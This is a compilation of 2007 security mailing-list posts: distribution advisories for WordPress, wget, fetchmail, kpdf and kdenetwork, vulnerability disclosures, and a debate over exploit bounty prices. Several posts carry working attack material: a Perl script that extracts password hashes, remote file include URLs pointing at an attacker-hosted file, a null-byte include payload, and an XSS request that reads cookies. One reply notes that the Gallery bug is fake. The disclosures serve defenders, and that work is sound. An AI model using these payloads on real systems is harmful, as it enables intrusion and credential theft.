[ GLSA 200701-10 ] WordPress: Multiple vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200701-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: WordPress: Multiple vulnerabilities Date: January 15, 2007 Bugs: #159229 ID: 200701-10 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis WordPress is vulnerable to SQL injection, information disclosure, and cross-site scripting attacks. Background == WordPress is a popular personal publishing platform with a web interface. Affected packages = --- Package / Vulnerable / Unaffected --- 1 www-apps/wordpress2.0.6 = 2.0.6 Description === When decoding trackbacks with alternate character sets, WordPress does not correctly sanitize the entries before further modifying a SQL query. WordPress also displays different error messages in wp-login.php based upon whether or not a user exists. David Kierznowski has discovered that WordPress fails to properly sanitize recent file information in /wp-admin/templates.php before sending that information to a browser. Impact == An attacker could inject arbitrary SQL into WordPress database queries. An attacker could also determine if a WordPress user existed by trying to login as that user, better facilitating brute force attacks. Lastly, an attacker authenticated to view the administrative section of a WordPress instance could try to edit a file with a malicious filename; this may cause arbitrary HTML or JavaScript to be executed in users' browsers viewing /wp-admin/templates.php. Workaround == There is no known workaround at this time. Resolution == All WordPress users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =www-apps/wordpress-2.0.6 References == [ 1 ] CVE-2006-6808 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6808 [ 2 ] CVE-2007-0107 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0107 [ 3 ] CVE-2007-0109 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0109 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200701-10.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 pgpo0iifY9t8a.pgp Description: PGP signature
Gallery = 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gallery = 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability Script : Gallery Version : 1.4.4-pl4 URL : http://puzzle.dl.sourceforge.net/sourceforge/gallery/gallery-1.6-alpha3.tar.gz Author : BorN To K!LL =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Code in :.contrib/phpBB2/modules.php include_once($phpbb_root_path . 'extension.inc'); include_once($phpbb_root_path . 'common.'.$phpEx); include_once($phpbb_root_path . 'includes/functions.'.$phpEx); =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Explo!t :. ^ www.site.com/[path]/contrib/phpBB2/modules.php?phpbb_root_path=shellcode.txt? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= GreeTz to : Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , str0ke ... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _ Don't just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/
PHPATM Remote Password Disclosure Vulnerablity
Hi
Application : php advanced transfer manager
Vulnerability Kind : Remote Password Hash Discloure
Product Link : phpatm.free.fr
version : All Versions Affected
mail: [EMAIL PROTECTED]
Author : Black-0ut
exploit :
#/usr/bin/perl
##
##
# [EMAIL PROTECTED]@[EMAIL PROTECTED] Security Team #
# Coded Discovered by Red_Dragon #
##
##
use LWP::Simple;
$ha=$ARGV[0];
$pa=$ARGV[1];
$ur=$ARGV[2];
if (!$ARGV[1]) {
print\n;
print [+] Coded By Red_Dragon or H3CT0R3 [+]\n;
print [+] KAYVANIRAN IT AND SECURITY TEAM [+] \n;
print [+]http://onhackerline.ir/ [+] \n;
print [+] Black 0ut Frenzy Team[+] \n;
print\n;
print ex : www.ex.com /path/ USER\n;
exit;
}
$vul=users/.$ur;
$start = get(http://.$ha.$pa.$vul) || die [-] Unable to retrieve: $!;
print \n;
print [+] Connected to : $ha;
$start=~m/([a-f0-9]{32})/;
print \n;
print [+] Username : $ur\n;
print [+] MD5 Hash : $1\n;
TNX
[ MDKSA-2007:017 ] - Updated wget packages fix ftp vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:017 http://www.mandriva.com/security/ ___ Package : wget Date: January 15, 2007 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0, Multi Network Firewall 2.0 ___ Problem Description: The ftp_syst function in ftp-basic.c in Free Software Foundation (FSF) GNU wget 1.10.2 allows remote attackers to cause a denial of service (application crash) via a malicious FTP server with a large number of blank 220 responses to the SYST command. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6719 ___ Updated Packages: Mandriva Linux 2006.0: 8f5fbe5fa003b203c5be4f65c72eafef 2006.0/i586/wget-1.10-1.2.20060mdk.i586.rpm 7bbe865186503532dc5fa194240167c0 2006.0/SRPMS/wget-1.10-1.2.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: a70b537b39d5397cb142b20bba55b6f5 2006.0/x86_64/wget-1.10-1.2.20060mdk.x86_64.rpm 7bbe865186503532dc5fa194240167c0 2006.0/SRPMS/wget-1.10-1.2.20060mdk.src.rpm Mandriva Linux 2007.0: c6331e96c0180a6fb364c4dd0d824bad 2007.0/i586/wget-1.10.2-3.1mdv2007.0.i586.rpm 53d0cfe5e83b5126d89963611dbe0196 2007.0/SRPMS/wget-1.10.2-3.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: b7826d019cb0bd54c8f59007566db782 2007.0/x86_64/wget-1.10.2-3.1mdv2007.0.x86_64.rpm 53d0cfe5e83b5126d89963611dbe0196 2007.0/SRPMS/wget-1.10.2-3.1mdv2007.0.src.rpm Corporate 3.0: 485d33aa6d44eedd9ae0fa41e6e1159d corporate/3.0/i586/wget-1.9.1-4.4.C30mdk.i586.rpm 6765dc9c586b7520a87e619095475a9b corporate/3.0/SRPMS/wget-1.9.1-4.4.C30mdk.src.rpm Corporate 3.0/X86_64: 4c64e7dfc485a04c4fd38d6f492d7e34 corporate/3.0/x86_64/wget-1.9.1-4.4.C30mdk.x86_64.rpm 6765dc9c586b7520a87e619095475a9b corporate/3.0/SRPMS/wget-1.9.1-4.4.C30mdk.src.rpm Corporate 4.0: 8050181ba71182203403e7d3b12b7922 corporate/4.0/i586/wget-1.10-1.2.20060mlcs4.i586.rpm 730e722809170908e017844728f87c86 corporate/4.0/SRPMS/wget-1.10-1.2.20060mlcs4.src.rpm Corporate 4.0/X86_64: 0be58a7ab8d999489b311fa12bf2e5d4 corporate/4.0/x86_64/wget-1.10-1.2.20060mlcs4.x86_64.rpm 730e722809170908e017844728f87c86 corporate/4.0/SRPMS/wget-1.10-1.2.20060mlcs4.src.rpm Multi Network Firewall 2.0: 31945b27c8a8777a7c2c55bbf12eff73 mnf/2.0/i586/wget-1.9.1-4.4.M20mdk.i586.rpm 6c94e26ee057c849a1a4f01b6777f818 mnf/2.0/SRPMS/wget-1.9.1-4.4.M20mdk.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team security*mandriva.com -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFFq/x+mqjQ0CJFipgRAnAiAJ47ZEJJrBiYZ74Z5I8nRNQjrRWj2wCfbSH1 FdqJ7ySHKajIZHxZqVbozx8= =DZk/ -END PGP SIGNATURE-
[KDE Security Advisory] kpdf/kword/xpdf denial of service vulnerability
KDE Security Advisory: kpdf/kword/xpdf denial of service vulnerability Original Release Date: 2007-01-15 URL: http://www.kde.org/info/security/advisory-20070115-1.txt 0. References CVE-2007-0104 1. Systems affected: KDE 3.2.0 up to including KDE 3.5.5. KDE 3.5.6 and newer is not affected. KOffice 1.2 and newer contain the same code. 2. Overview: kpdf, the KDE pdf viewer, shares code with xpdf. xpdf contains a vulnerability that can cause denial of service (infinite loop) via a PDF file that contains a crafted catalog dictionary or a crafted Pages attribute that references an invalid page tree node. 3. Impact: Remotely supplied pdf files can be used to disrupt the kpdf viewer on the client machine. 4. Solution: Source code patches have been made available which fix these vulnerabilities. Contact your OS vendor / binary package provider for information about how to obtain updated binary packages. 5. Patch: Patch for KOffice 1.2.1 and newer is available from ftp://ftp.kde.org/pub/kde/security_patches : dc28881c39f11c040f8c942e4af238d1 koffce-xpdf-CVE-2007-0104.diff Patch for KDE 3.3.2 and newer is available from ftp://ftp.kde.org/pub/kde/security_patches : a690ce46117257609c2b43485ea4d0d7 post-3.5.5-kdegraphics-CVE-2007-0104.diff Patch for KDE 3.2.3 and newer is available from ftp://ftp.kde.org/pub/kde/security_patches : c2d4c2aa3aa990e2dba00f782a140a1b post-3.2.3-kdegraphics-CVE-2007-0104.diff
[ MDKSA-2007:016 ] - Updated fetchmail packages fix vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:016 http://www.mandriva.com/security/ ___ Package : fetchmail Date: January 15, 2007 Affected: 2006.0, 2007.0, Corporate 3.0, Corporate 4.0 ___ Problem Description: Fetchmail before 6.3.6-rc4 does not properly enforce TLS and may transmit cleartext passwords over unsecured links if certain circumstances occur, which allows remote attackers to obtain sensitive information via man-in-the-middle (MITM) attacks. The updated packages have been patched to correct this problem. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2006-5867 ___ Updated Packages: Mandriva Linux 2006.0: a18ed6ffe44795de4207b12b4b4f7e4d 2006.0/i586/fetchmail-6.2.5-11.3.20060mdk.i586.rpm ddfdd7544b80650b3bf8d1d84abd5cbe 2006.0/i586/fetchmail-daemon-6.2.5-11.3.20060mdk.i586.rpm a310ecd2fef17d265c688c62478fc0b2 2006.0/i586/fetchmailconf-6.2.5-11.3.20060mdk.i586.rpm 1ac8f74cfcea74d41699bcea680b4cdd 2006.0/SRPMS/fetchmail-6.2.5-11.3.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: f762e2e7752e4a0c2954b222728f35f1 2006.0/x86_64/fetchmail-6.2.5-11.3.20060mdk.x86_64.rpm 9a3afcab894242dedb352be782c810f3 2006.0/x86_64/fetchmail-daemon-6.2.5-11.3.20060mdk.x86_64.rpm 6ab3758219b64100c73b34ddcb461d35 2006.0/x86_64/fetchmailconf-6.2.5-11.3.20060mdk.x86_64.rpm 1ac8f74cfcea74d41699bcea680b4cdd 2006.0/SRPMS/fetchmail-6.2.5-11.3.20060mdk.src.rpm Mandriva Linux 2007.0: 00e5ff3f7e0d33f2c9ccc39667e01238 2007.0/i586/fetchmail-6.3.4-3.1mdv2007.0.i586.rpm 029afb1de6f50c98ef7993b97fe89524 2007.0/i586/fetchmail-daemon-6.3.4-3.1mdv2007.0.i586.rpm fbf0828751dc8ac2a42c471a2deccaba 2007.0/i586/fetchmailconf-6.3.4-3.1mdv2007.0.i586.rpm 01a836a578f0f1629eea747d79aabf2e 2007.0/SRPMS/fetchmail-6.3.4-3.1mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: d59d414b0afdcb0bc25fde8b4e7e4397 2007.0/x86_64/fetchmail-6.3.4-3.1mdv2007.0.x86_64.rpm 3f7a039d209f8f41e44e17daf18ff5bf 2007.0/x86_64/fetchmail-daemon-6.3.4-3.1mdv2007.0.x86_64.rpm eae3948818dac3a5ecec8530fd27b9df 2007.0/x86_64/fetchmailconf-6.3.4-3.1mdv2007.0.x86_64.rpm 01a836a578f0f1629eea747d79aabf2e 2007.0/SRPMS/fetchmail-6.3.4-3.1mdv2007.0.src.rpm Corporate 3.0: 1f0b013294c63425978e953ac25873cf corporate/3.0/i586/fetchmail-6.2.5-3.4.C30mdk.i586.rpm 06eb2b920279a7ae2e46396d8e81b032 corporate/3.0/i586/fetchmail-daemon-6.2.5-3.4.C30mdk.i586.rpm d9124e109996d99a69dc87724e753994 corporate/3.0/i586/fetchmailconf-6.2.5-3.4.C30mdk.i586.rpm 62b8c91fa6d6d3a1f31c2fda11027554 corporate/3.0/SRPMS/fetchmail-6.2.5-3.4.C30mdk.src.rpm Corporate 3.0/X86_64: dd09c3c7098e6f6d96221cc3880ddcfb corporate/3.0/x86_64/fetchmail-6.2.5-3.4.C30mdk.x86_64.rpm 2e088587891d22fa8e6937e58a5a52f5 corporate/3.0/x86_64/fetchmail-daemon-6.2.5-3.4.C30mdk.x86_64.rpm 7067aa53deb5fb0320577f78125d0464 corporate/3.0/x86_64/fetchmailconf-6.2.5-3.4.C30mdk.x86_64.rpm 62b8c91fa6d6d3a1f31c2fda11027554 corporate/3.0/SRPMS/fetchmail-6.2.5-3.4.C30mdk.src.rpm Corporate 4.0: 7f9ad01da70611e6e78a4ddad78aafb3 corporate/4.0/i586/fetchmail-6.2.5-11.3.20060mlcs4.i586.rpm f33c0f64095ce82e41a45795c4f1c349 corporate/4.0/i586/fetchmail-daemon-6.2.5-11.3.20060mlcs4.i586.rpm 8a1cf9fc1900e6f93edc4d111618c640 corporate/4.0/i586/fetchmailconf-6.2.5-11.3.20060mlcs4.i586.rpm eed734d10397d929782e5471f46dcb21 corporate/4.0/SRPMS/fetchmail-6.2.5-11.3.20060mlcs4.src.rpm Corporate 4.0/X86_64: 022aa138f270c935d05c67c87a4add31 corporate/4.0/x86_64/fetchmail-6.2.5-11.3.20060mlcs4.x86_64.rpm 11a617dcb9e5c9c5848446f86f2ae939 corporate/4.0/x86_64/fetchmail-daemon-6.2.5-11.3.20060mlcs4.x86_64.rpm 0aaeedf0144abca7db1bdb20cbec04f2 corporate/4.0/x86_64/fetchmailconf-6.2.5-11.3.20060mlcs4.x86_64.rpm eed734d10397d929782e5471f46dcb21 corporate/4.0/SRPMS/fetchmail-6.2.5-11.3.20060mlcs4.src.rpm ___ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com ___ Type Bits/KeyID Date
dt_guestbook version 1.0f XSS vulnerability
netVigilance Security Advisory #10 dt_guestbook version 1.0f XSS vulnerability Description: dt_guestbook is a fully-featured message board system with admin interface. Due to program flaws it is possible for the remote attacker to conduct XSS attacks. The remote attacker can convince the victim to open a specially crafted link that is a trusted guestbook server and execute arbitrary code in the users browser session. External References: Mitre CVE: CVE-2006-6487 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6487 NVD NIST: CVE-2006-6487 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2006-6487 OSVDB: 30787 http://www.osvdb.com/displayvuln.php?osvdb_id=30787 Summary: dt_guestbook a fully-featured message board system with admin interface. A security problem in the product allows attackers to conduct XSS attacks. This vulnerability can be exploited only when PHP register_globals is On. Release Date: Severity: Risk: Medium CVSS Metrics Access Vector: Remote Access Complexity: High Authentication: not-required Confidentiality Impact: Partial Integrity Impact: Partial Availability Impact: Partial Impact Bias: Normal CVSS Base Score: 5.6 Target Distribution on Internet: Low Exploitability: Functional Exploit Remediation Level: Workaround Report Confidence: Uncorroborated Vulnerability Impact: Attack Host Impact: cross-site scripting. SecureScout Testcase ID: TC 17940 Vulnerable Systems: dt_guestbook 1.0f. Vulnerability Type: XSS (Cross-Site Scripting) to force a web-site to display malicious contents to the target, by sending a specially crafted request to the web-site. The vulnerable web-site is not the target of attack but is used as a tool for the hacker in the attack of the victim. Vendor Status: Author Alexander Fedorov was notified on Dec 8 2006 and agreed to correct the XSS in his product. He has failed to respond to emails or Chat since Dec 8 2006. . Solution: Patch Possibly Pending from Vendor, please check http://fedorov.vitalain.ru for updates. . Workaround: Set PHP register_globals to Off. Example: HTTP REQUEST http://[TARGET]/[dt_guestbook_v1-directory]/index.php?submit=1error[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E REPLY ... will execute scriptalert(document.cookie)/script ... Advisory URL: http://www.netvigilance.com/advisory0009 Credits: Jesper Jurcenoks Co-founder netVigilance, Inc www.netvigilance.com
rPSA-2007-0007-1 kdenetwork
rPath Security Advisory: 2007-0007-1 Published: 2007-01-15 Products: rPath Linux 1 Rating: Informational Exposure Level Classification: Indirect User Deterministic Denial of Service Updated Versions: kdenetwork=/[EMAIL PROTECTED]:devel//1/3.4.2-3.3-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6811 https://issues.rpath.com/browse/RPL-922 Description: Previous versions of the kdenetwork package contain a ksirc program which can crash due to an incorrect assertion, if it talks to a malicious IRC server or connects to a malicious man-in-the-middle when talking to an IRC server.
Re: Gallery = 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability
Gallery 1.4.4-pl4 and all versions of Gallery 1 more recent than this (I didn't check older versions as they are over 2 years old) are actually not vulnerable to this. The actual code in contrib/phpBB2/ modules.php is: 42 $phpbb_root_path = ./; 43 // connect to phpbb 44 include_once($phpbb_root_path . 'extension.inc'); 45 include_once($phpbb_root_path . 'common.'.$phpEx); 46 include_once($phpbb_root_path . 'includes/functions.'.$phpEx); which defines phpbb_root_path first. Overwriting this through a get parameter would do no good because of line 42, and by default Gallery 1 refuses to install if register_globals is enabled which should prevent the reported problem even if line 42 is not included. Source code for reference: 1.4.4-pl4: http://gallery.svn.sourceforge.net/viewvc/gallery/tags/ RELEASE_1_4_4_PL4/gallery/contrib/phpBB2/modules.php?view=markup Current 1.5 branch (most up to date Gallery 1.5 versions, current stable version) http://gallery.svn.sourceforge.net/viewvc/gallery/branches/ BRANCH_1_5_LEGACY/gallery/contrib/phpBB2/modules.php?view=markup SVN turnk (current development, current 1.6-alpha3 and future release candidates) http://gallery.svn.sourceforge.net/viewvc/gallery/trunk/gallery/ contrib/phpBB2/modules.php?view=markup -Chris Gallery Project Manager -- Chris Kelly [EMAIL PROTECTED] http://ckdake.com/ On Jan 16, 2007, at 8:52 AM, me you wrote: =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Gallery = 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability Script : Gallery Version : 1.4.4-pl4 URL : http://puzzle.dl.sourceforge.net/sourceforge/gallery/ gallery-1.6-alpha3.tar.gz Author : BorN To K!LL =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Code in :.contrib/phpBB2/modules.php include_once($phpbb_root_path . 'extension.inc'); include_once($phpbb_root_path . 'common.'.$phpEx); include_once($phpbb_root_path . 'includes/functions.'.$phpEx); =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Explo!t :. ^ www.site.com/[path]/contrib/phpBB2/modules.php? phpbb_root_path=shellcode.txt? =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= GreeTz to : Dr.2 , Asbmay , General C , ToOoFa , SHiKaA , str0ke ... =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= _ Don't just search. Find. Check out the new MSN Search! http:// search.msn.click-url.com/go/onm00200636ave/direct/01/
Announcement: The Cross-site Request Forgery FAQ
The Cross-site Request Forgery FAQ has been released to address some of the common questions and misconceptions regarding this commonly misunderstood web flaw. URL: The Cross-site Request Forgery FAQ http://www.cgisecurity.com/articles/csrf-faq.shtml Regards, - Robert [EMAIL PROTECTED] http://www.cgisecurity.com/ http://www.qasec.com/ http://www.webappsec.org/
Re: Gallery = 1.4.4-pl4 (phpbb_root_path) Remote File Include Vulnerability
Hi, Yeah , you are the best ;[ P.S:It is fake bug, because (...) $phpbb_root_path = ./; (...) (http://www.google.com/codesearch?hl=plq=show:QzeIQQZQ7BQ:h8q8TE-XBMQ:Ex0tElneoM4sa=Nct=rdcs_p=http://www.pottum.nl/gallery_web/gallery-1.4.4-pl4-sms9.tar.gzcs_f=gallery/contrib/phpBB2/modules.php) P.S2:When you publish something like that, I say What an idiot!? -- Best degradation , Maciej `krasza` Kukla
Re: Jax Petition Book (languagepack) Remote File Include Vulnerabilities
Actually, this can be pretty serious depending on server settings, but an improper example was given. Better one: jax_petitionbook.php?languagepack=../../some_other_allowed_file_uploads/myfile.php.gif%00 Many servers will have magic quotes on to defeat the null byte, but by no means all. John [EMAIL PROTECTED] wrote: This is not a vulnerability. Since $languagepack is prefixed by language/, the PHP stream handler will simply try to open a local file. Also, you can only modify $languagepack if register_globals is on, which, it rarely is these days. Can we stop with the PHP 'vulnerabilities' that aren't? -Blake Whatchu talkin' 'bout, Willis? -- AYYILDIZ.ORG PreSents... *Script: Jax Petition Book *Download: jtr.de/scripting/php/guestbook/petitionbook%20v1.0.3.06.zip *Contact: ilker Kandemir ilkerkandemir[at]mynet.com --- *Code: require ( language/ .$languagepack . .inc.php ); --- *Exploit: jax_petitionbook.php?languagepack=http://attacker.txt? smileys.php?languagepack=http://attacker.txt? --- Tnx:H0tturk,Dr.Max Virus,Asianeagle,PcDelisi,CodeR,Dum?nci Special Tnx: AYYILDIZ.ORG
Re: Remedy Action Request System 5.01.02 - User Enumeration
Lee Rumble writes: This has always been the case with the Remedy system which I use day in and day out. This is also present in older versions too and I have spoken with them about this, but they do not deem this to be a security flaw. Hello Lee, if they think or not it is a security flaw, well, it's their opinion. I think that the possibility to enumerate users is a security flaw, and you? Gaining access to the system itself has no real advantages either. It depends from what the system is used for. There are a lot of companies that use to attach important documents to the remedy tickets or use remedy to trace every activity. According to you, is it important to access the repository in which every activity has been traced ? Best regards, d. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Davide Del Vecchio Dante Alighieri [EMAIL PROTECTED] http://www.alighieri.org http://legaest.blogspot.com - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
I know someone who will pay significantly more per vulnerability against the same targets. On 1/10/07 12:27 PM, contributor [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Also available at: http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+chall enge *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in Vista IE 7.0* Both Microsoft Internet Explorer and Microsoft Windows dominate their respective markets, and it is not surprising that the decision to update to the current release of Internet Explorer 7.0 and/or Windows Vista is fraught with uncertainty. Primary in the minds of IT security professionals is the question of vulnerabilities that may be present in these two groundbreaking products. To help assuage this uncertainty, iDefense Labs is pleased to announce the Q1, 2007 quarterly challenge. Remote Arbitrary Code Execution Vulnerabilities in Vista and IE 7.0 Vulnerability Challenge: iDefense will pay $8,000 for each submitted vulnerability that allows an attacker to remotely exploit and execute arbitrary code on either of these two products. Only the first submission for a given vulnerability will qualify for the award, and iDefense will award no more than six payments of $8000. If more than six submissions qualify, the earliest six submissions (based on submission date and time) will receive the award. The iDefense Team at VeriSign will be responsible for making the final determination of whether or not a submission qualifies for the award. The criteria for this phase of the challenge are: I) Technologies Covered: - -Microsoft Internet Explorer 7.0 - -Microsoft Windows Vista II) Vulnerability Challenge Ground Rules: - -The vulnerability must be remotely exploitable and must allow arbitrary code execution in a default installation of one of the technologies listed above - -The vulnerability must exist in the latest version of the affected technology with all available patches/upgrades applied - -'RC' (Release candidate), 'Beta', 'Technology Preview' and similar versions of the listed technologies are not included in this challenge - -The vulnerability must be original and not previously disclosed either publicly or to the vendor by another party - -The vulnerability cannot be caused by or require any additional third party software installed on the target system - -The vulnerability must not require additional social engineering beyond browsing a malicious site Working Exploit Challenge: In addition to the $8000 award for the submitted vulnerability, iDefense will pay from $2000 to $4000 for working exploit code that exploits the submitted vulnerability. The arbitrary code execution must be of an uploaded non-malicious payload. Submission of a malicious payload is grounds for disqualification from this phase of the challenge. I) Technologies Covered: - -Microsoft Internet Explorer 7.0 - -Microsoft Windows Vista II) Working Exploit Challenge Ground Rules: Working exploit code must be for the submitted vulnerability only iDefense will not consider exploit code for existing vulnerabilities or new vulnerabilities submitted by others. iDefense will consider one and only one working exploit for each original vulnerability submitted. The minimum award for a working exploit is $2000. In addition to the base award, additional amounts up to $4000 may be awarded based upon: - -Reliability of the exploit - -Quality of the exploit code - -Readability of the exploit code - -Documentation of the exploit code -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFFpSHsYcX4JiqFDSgRAl+ZAJwMJaZoJ6zwd4m8qZfviOZnNNUVrACgpaTU QkO9IXq+PsC6 bMKg7j6Dwfw= =N0am -END PGP SIGNATURE- ___ Full-Disclosur e - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Q-1 2007 Challenge
No offense to iDefense as I have used their services in the past... but MY Q1 2007 Challenge to YOU is to start offering your researchers more money in general! I've sold remotely exploitable bugs in random 3rd party products for more $$ than you are offering for these Vista items (see the h0n0 #3). I really think you guys are devaluing the exploit market with your low offers... I've had folks mail me like WOW iDefense offered me $800 for this remote exploit. Pfffttt not quite. We all know black hats are selling these sploits for =$25k so why should the legit folks settle for anything less? As an example the guys at MOAB kicked around selling a Quicktime bug to iDefense but in the end we decided it was not worth it due to low pay... Low Pay == Not getting disclosed via iDefense -KF I know someone who will pay significantly more per vulnerability against the same targets. On 1/10/07 12:27 PM, contributor [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Also available at: http://labs.idefense.com/vcp/challenge.php#more_q1+2007%3A+vulnerability+chall enge *Challenge Focus: Remote Arbitrary Code Execution Vulnerabilities in Vista IE 7.0* Both Microsoft Internet Explorer and Microsoft Windows dominate their respective markets, and it is not surprising that the decision to update to the current release of Internet Explorer 7.0 and/or Windows Vista is fraught with uncertainty. Primary in the minds of IT security professionals is the question of vulnerabilities that may be present in these two groundbreaking products. To help assuage this uncertainty, iDefense Labs is pleased to announce the Q1, 2007 quarterly challenge. Remote Arbitrary Code Execution Vulnerabilities in Vista and IE 7.0 Vulnerability Challenge: iDefense will pay $8,000 for each submitted vulnerability that allows an attacker to remotely exploit and execute arbitrary code on either of these two products. Only the first submission for a given vulnerability will qualify for the award, and iDefense will award no more than six payments of $8000. If more than six submissions qualify, the earliest six submissions (based on submission date and time) will receive the award. The iDefense Team at VeriSign will be responsible for making the final determination of whether or not a submission qualifies for the award. The criteria for this phase of the challenge are: I) Technologies Covered: - -Microsoft Internet Explorer 7.0 - -Microsoft Windows Vista II) Vulnerability Challenge Ground Rules: - -The vulnerability must be remotely exploitable and must allow arbitrary code execution in a default installation of one of the technologies listed above - -The vulnerability must exist in the latest version of the affected technology with all available patches/upgrades applied - -'RC' (Release candidate), 'Beta', 'Technology Preview' and similar versions of the listed technologies are not included in this challenge - -The vulnerability must be original and not previously disclosed either publicly or to the vendor by another party - -The vulnerability cannot be caused by or require any additional third party software installed on the target system - -The vulnerability must not require additional social engineering beyond browsing a malicious site Working Exploit Challenge: In addition to the $8000 award for the submitted vulnerability, iDefense will pay from $2000 to $4000 for working exploit code that exploits the submitted vulnerability. The arbitrary code execution must be of an uploaded non-malicious payload. Submission of a malicious payload is grounds for disqualification from this phase of the challenge. I) Technologies Covered: - -Microsoft Internet Explorer 7.0 - -Microsoft Windows Vista II) Working Exploit Challenge Ground Rules: Working exploit code must be for the submitted vulnerability only iDefense will not consider exploit code for existing vulnerabilities or new vulnerabilities submitted by others. iDefense will consider one and only one working exploit for each original vulnerability submitted. The minimum award for a working exploit is $2000. In addition to the base award, additional amounts up to $4000 may be awarded based upon: - -Reliability of the exploit - -Quality of the exploit code - -Readability of the exploit code - -Documentation of the exploit code -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.3 (MingW32) Comment: Using GnuPG with Mozilla
vulnerability script indexu all versions
